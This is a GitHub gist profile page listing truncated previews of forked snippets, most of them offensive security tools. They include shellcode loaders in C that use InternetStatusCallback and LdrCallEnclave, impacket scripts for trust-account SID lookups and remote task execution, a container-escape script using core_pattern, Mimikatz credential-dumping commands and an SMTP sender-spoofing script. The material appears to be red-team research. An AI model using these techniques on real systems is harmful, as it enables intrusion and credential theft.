Skip to content

Instantly share code, notes, and snippets.

View emdnaia's full-sized avatar
👾

emdnaia

👾
58 followers · 364 following
View GitHub Profile
@emdnaia
emdnaia / JasonToddIsTheBestRobin.c
Created September 25, 2025 17:25 — forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@emdnaia
emdnaia / enclave.c
Created August 3, 2025 22:56 — forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
@emdnaia
emdnaia / nginx-reverse-proxy-sing-box.conf
Created March 19, 2025 02:14 — forked from bitcoinvps/nginx-reverse-proxy-sing-box.conf
stream {
map $ssl_preread_server_name $singbox {
trojan.example.com trojan;
trojan-ws.example.com trojan-ws;
trojan-ws-6.example.com trojan-ws-6;
vmess.example.com vmess;
vmess-ws.example.com vmess-ws;
vmess-ws-6.example.com vmess-ws-6;
}
upstream trojan {
@emdnaia
emdnaia / lsarlookupsids3_aes.py
Created February 6, 2025 22:56 — forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys
# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
# Tested with impacket 0.12.0 on GOAD
@emdnaia
emdnaia / Dockerfile
Created December 16, 2024 04:05 — forked from HoKim98/Dockerfile
Multi-screen (Multi-GPU) XFCE Settings
# Copyright (c) 2023 Ho Kim ([email protected]). All rights reserved.
# Configure environment variables
ARG ROCKYLINUX_VERSION="8"
# Be ready for serving
FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base
# Install desktop environment dependencies
RUN dnf install -y \
@emdnaia
emdnaia / atexec_rpc.py
Created November 29, 2024 04:41 — forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
@emdnaia
emdnaia / core_pattern_escape.sh
Created October 26, 2024 19:19 — forked from magisterquis/core_pattern_escape.sh
Script to escape a container with /proc/sys/kernel/core_pattern reusing the existing shell's stdio
#!/bin/bash
#
# core_pattern_escape.sh
# Simple script to escape a container via /proc/sys/kernel/core_pattern
# By J. Stuart McMurray
# Created 20241026
# Last Modified 20241026
# Drop to /esc (or whatever name) in a container and...
#
@emdnaia
emdnaia / Mimikatz-cheatsheet
Created October 20, 2024 01:43 — forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
@emdnaia
emdnaia / smtp.py
Created September 27, 2024 03:08 — forked from w1lsec/smtp.py
from socket import *
mail_server = ("tantotesting.mail.protection.outlook.com", 25)
client_socket = socket(AF_INET, SOCK_STREAM)
helo = "helo tantomail.com"
mail_from = "mail from: <[email protected]>"
rcpt_to = "rcpt to: <[email protected]>"
mail = """from: \x1f <,><[email protected]>\r
sender: "James Bond" <[email protected]>\r
@emdnaia
emdnaia / function-mappings.csv
Created August 31, 2024 21:17 — forked from mez-0/function-mappings.csv
Common DLL's exports mapped to descriptions and categories via an LLM
We can't make this file beautiful and searchable because it's too large.
title description category
KERNEL32.DLL!TerminateJobObject This function terminates all processes associated with a job- managing processes and threads. Process and Thread Management
RPCRT4.DLL!NdrServerCall2 Facilitates remote procedure calls (RPC) but is not user-invoked. Network Operations
SHLWAPI.DLL!StrCSpnW Searches a string for specific characters- providing their index. Involves string manipulation rather than file or network processes. Memory Management
GDI32FULL.DLL!UpdateColors Updates the client area of a device context by remapping current colors to the logical palette. System Information and Control
RPCRT4.DLL!IUnknown_AddRef_Proxy Implements the AddRef method for interface proxies- managing reference counting in COM. Process and Thread Management
ADVAPI32.DLL!RegEnumKeyW Enumerates subkeys of an open registry key- indicating direct registry manipulation. Registry Operations
SECHOST.DLL!CredDeleteA Deletes a credential from the user's credential set- modifying stored authentication data.